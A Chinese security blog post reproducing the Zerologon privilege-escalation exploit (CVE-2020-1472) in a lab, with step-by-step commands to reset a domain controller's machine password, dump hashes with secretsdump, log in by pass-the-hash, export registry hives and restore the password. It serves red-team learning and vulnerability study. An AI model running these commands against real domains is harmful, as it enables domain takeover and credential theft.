『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec


日期:2021-06-10

作者:herbmint

介绍:这篇文章简单复现了netlogon权限提升漏洞,对应 CVE-2020-1472


0x00 前言

在学习内网渗透中利用到了cve-2020-1472漏洞,这里做一下简单的复现;

0x01 漏洞复现

1.1 漏洞描述

攻击者通过NetLogon远程协议(MS-NRPC)建立与域控制器连接的Netlogon安全通道时,可以利用此漏洞获取域控制器的管理员权限。

1.2 影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

1.3 环境配置

1.3.1 安装impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 -m pip install .

1.3.2 漏洞利用exp

git clone https://github.com/dirkjanm/CVE-2020-1472

1.3.3 漏洞验证poc

git clone https://github.com/SecuraBV/CVE-2020-1472

1.3.4 复现过程

1)探测目标机是否存在cve-2020-1472

python3 zerologon_tester.py  win08  192.168.223.133

图片[1]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

2) 将目标机中域控的密码置空

python3  cve-2020-1472-exploit.py  win08  192.168.223.133
# 注:这里清空的是ditd.dit文件中存储的机器用户的密码;

图片[2]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

3)使用impacket下的secretdump.py脚本去获取域控的HASH

secretsdump.py test.com/win08\[email protected] -no-pass
注:这里的攻击机器是liunx机器,所以在终端中输入命令需要转义;
如果是windows,则无需转义;

图片[3]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

4)使用HASH通过PTH登录到域控服务器;

wmiexec.py test.com/[email protected] -hashes  :afffeba176210fad4628f0524bfe1942

图片[4]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

5)导出域控账号的原始hash

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
注:上述产生的文件是存在目标机中,需要导出到攻击机中;
get sam.hive
get system.hive
get security.hive

图片[5]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

6)使用secretsdumo.py读取hash文件

secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

图片[6]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

7)恢复域控的密码

python3 reinstall_original_pw.py  win08 192.168.223.133 79e0831681fc703c76295202fac36b0570a0d536a302ecc37341df6018b2918941743a443f9c19f26edc57c7b0dfa4f26c83419552bd45e5f110622582f27f649dd4a63be6e93d106f68b2d03043b4e24f076177084534594750ac8fc054bf3118f4bd73ac506cafb051d60d6fcff4852474ceebba12726551d81031e84e06d21380b96f1b0ad6d9736854af6fe20719aa70342ac77f75099521854ad02cac1901b87300172f03b1e185de535ebc22a568fd38c9ab53bd4fa3d621126af124e5eb1c7d74470add983f16420ca005156442bde6e08a4312fe510712911f408efde41dbd9ea8e2c0281872362250a07d2c

图片[7]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

8)检查密码是否恢复,如果可以获取到hash则证明没有成功写入密码;

python3 secretdump.py  test.com/win08\[email protected]  -no-pass

图片[8]-『红蓝对抗』NetLogon权限提升漏洞 – 作者:宸极实验室Sec-安全小百科

0x03 总结

NetLogon服务在DC和域成员服务器上运行,为域身份验证提供重要服务,如果此服务停止域成员服务器将无法登录到域;

当域控制器中NTDS.dit文件和注册表文件的计算机帐户口令hash不同步时,有可能影响系统的正常功能 ,需谨慎使用此漏洞。

来源:freebuf.com 2021-06-10 15:26:29 by: 宸极实验室Sec

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论